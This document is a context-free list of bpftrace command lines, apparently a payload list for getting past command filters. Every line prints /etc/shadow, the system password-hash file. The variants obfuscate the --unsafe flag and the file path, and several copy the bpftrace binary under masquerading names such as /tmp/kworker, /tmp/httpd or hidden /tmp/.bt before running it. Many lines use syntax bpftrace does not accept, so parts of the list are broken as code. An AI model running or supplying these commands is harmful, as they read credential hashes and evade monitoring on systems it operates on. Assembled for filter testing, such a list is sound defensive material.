bpftrace --"unsafe" -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --un"safe" -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --uns"afe" -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsa"fe" -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", ca""t("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", c"at"("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/et""c/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc"/"shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/sh""adow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { pr""intf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u""nsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsa""fe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsaf""e -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/e""tc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/s""hadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shad""ow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shado""w")); exit(); }'
bpftrace --unsa--fe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u--nsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --un--safe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsa--fe -e 'BEGIN { printf("%s\n", ca"t"("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", ca"t"("/etc"/"shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { prin"tf"("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BE"G"I"N { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { p"r"intf("%s\n", cat("/etc/shadow")); ex"it"(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); ex"it"(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); ex""it(); }'
bpftrace --unsa""fe -e 'BEGIN { pr""intf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsa_fe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u_nsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u-nsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --uns-afe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsa-fe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsa--fe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsa_fe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --un_safe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsa_fe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u"n"s"afe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u_n_s_a_f_e -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u-n-s-a-f-e -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsaf\\e -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsa\\fe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --"u""n""s""a""f""e" -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", ca""t("/etc/shadow")); ex""it(); }'
bpftrace --unsafe -e 'BEGIN { pr""intf("%s\n", cat("/etc/shadow")); ex""it(); }'
bpftrace --unsa"f"e -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u"n"safe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --"unsafe" -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BE"GI"N { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", ca""t("/e""tc"/"shadow")); exit(); }'
bpftrace --dangerous -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsecure -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --risk -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u_n_s_a_f_e -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe-mode -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --not-safe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --lesssafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --nosafety -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --risklevel=high -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --bypass-safety -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u⁻n⁻s⁻a⁻f⁻e -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unverified -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --force-mode -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --raw-mode -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --elevated -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --!unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --_unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe=1 -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe_enabled -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --allow-priv -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --accept-risk -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --use_unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --hazard -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --peril -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --no-guards -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --override -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --notrecommended -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --developer -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --expert -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --advanced -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --potential-risk -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --disable-protect -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --highpriv -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --untrusted -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --diy-mode -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --safety-off -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --no-validation -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --u̶n̶s̶a̶f̶e̶ -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --adminonly -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --testing -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --power-mode -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --release-mode -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --hiddenflag -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --sneaky -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --noalerts -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --shieldless -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --godmode -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --superuser -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --breakglass -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --xunsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' unsafe
bpftrace --unsfe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' -u
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --usafe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsa
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsa_fe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsaf
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' -unsafe
bpftrace --e='BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --
bpftrace e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --e -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsfe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -unsfe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --xunsafe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' -usafe
bpftrace --uunsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsa-fe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsa_fe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' -unsafe_
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' -un_safe
bpftrace -- -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsefe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --uanfsafe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace -e 'BEGIN { exit(); printf("%s\n", cat("/etc/shadow")); }' --unsafe
bpftrace --unsafe 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' -e
bpftrace 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' -e --unsafe
bpftrace --unsafe -e 'BEGIN { exit(); printf("%s\n", cat("/etc/shadow")); }'
bpftrace -e --unsafe 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace 'BEGIN { exit(); printf("%s\n", cat("/etc/shadow")); }' --unsafe -e
bpftrace --unsafe 'BEGIN { exit(); printf("%s\n", cat("/etc/shadow")); }' -e
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); }' --unsafe -e 'exit();'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); } exit();'
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); }' exit(); --unsafe
bpftrace --unsafe exit(); -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); }'
bpftrace exit(); -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); }' --unsafe
bpftrace -e 'BEGIN { } printf("%s\n", cat("/etc/shadow")); exit();' --unsafe
bpftrace --unsafe -e 'BEGIN { } printf("%s\n", cat("/etc/shadow")); exit();'
bpftrace 'BEGIN { } printf("%s\n", cat("/etc/shadow")); exit();' -e --unsafe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace -e 'BEGIN { exit(); } printf("%s\n", cat("/etc/shadow"));' --unsafe
bpftrace --unsafe -e 'BEGIN { exit(); } printf("%s\n", cat("/etc/shadow"));'
bpftrace 'BEGIN { printf("%s\n", cat("/etc/shadow")); }' exit(); -e --unsafe
bpftrace --unsafe 'BEGIN { printf("%s\n", cat("/etc/shadow")); }' exit(); -e
bpftrace -e 'BEGIN { } exit(); printf("%s\n", cat("/etc/shadow"));' --unsafe
bpftrace --unsafe -e 'BEGIN { } exit(); printf("%s\n", cat("/etc/shadow"));'
bpftrace 'BEGIN { } exit(); printf("%s\n", cat("/etc/shadow"));' -e --unsafe
bpftrace -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); }' --unsafe exit();
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); }' exit();
bpftrace exit(); --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); }'
bpftrace --unsafe exit(); -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); }'
bpftrace -e exit(); 'BEGIN { printf("%s\n", cat("/etc/shadow")); }' --unsafe
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc//shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/./shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow" "") ); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/sh\x61dow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/\u0073hadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/et" "c/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/" "shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow\0")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat(`/etc/shadow`)); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shad" "ow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/e" "tc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/sh\x68adow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".substr(0))); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/sh" + "adow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shad"+"ow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/et"+"c/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/et" + "c/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".to_string())); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".slice(0))); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".replace("",""))); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".encode())); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow" + "")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc" + "/" + "shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".to_owned())); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/e\u0074c/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/s\u0068adow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".concat())); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow"[0:])); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow"[::])); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat(("/etc/shadow"))); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/" + "shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/e"+"tc/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc//shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow ")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/\x73hadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/\u0073hadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat(String("/etc/shadow"))); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat(`/etc/sha `"dow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/et" + "c/sh" + "adow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc" + "/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".trim())); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".strip())); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".rstrip())); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".lstrip())); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/" + "sha" + "dow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/sh" + "a" + "dow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/" + "etc" + "/shadow")); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow".join(""))); exit(); }'
bpftrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow"[0:13])); exit(); }'
cp $(which bpftrace) trace; ./trace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(command -v bpftrace) tracer; ./tracer --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace /tmp/x; /tmp/x --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace bt; ./bt --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
install -m 755 $(which bpftrace) ./shadowdump; ./shadowdump --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace mybt; ./mybt --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) /tmp/evil; /tmp/evil --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) /dev/shm/runbt; /dev/shm/runbt --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace /tmp/.bt; /tmp/.bt --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace ./dottrace; ./dottrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
ln /usr/bin/bpftrace ./ltrace; ./ltrace --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) /tmp/sysmain; /tmp/sysmain --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) /tmp/kworker; /tmp/kworker --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace /tmp/bashd; /tmp/bashd --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) ./daemon; ./daemon --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) /tmp/sbin; /tmp/sbin --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace /tmp/loggerd; /tmp/loggerd --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) /tmp/httpd; /tmp/httpd --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace ./initctl; ./initctl --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(command -v bpftrace) ./netd; ./netd --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace ./service; ./service --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) /tmp/bt_shadow; /tmp/bt_shadow --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace ./update; ./update --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) ./runlogd; ./runlogd --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace ./cronsh; ./cronsh --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) ./bt-x; ./bt-x --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace ./a.out; ./a.out --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp /usr/bin/bpftrace /tmp/core; /tmp/core --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) ./tmp.shd; ./tmp.shd --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'
cp $(which bpftrace) ./bt_sh; ./bt_sh --unsafe -e 'BEGIN { printf("%s\n", cat("/etc/shadow")); exit(); }'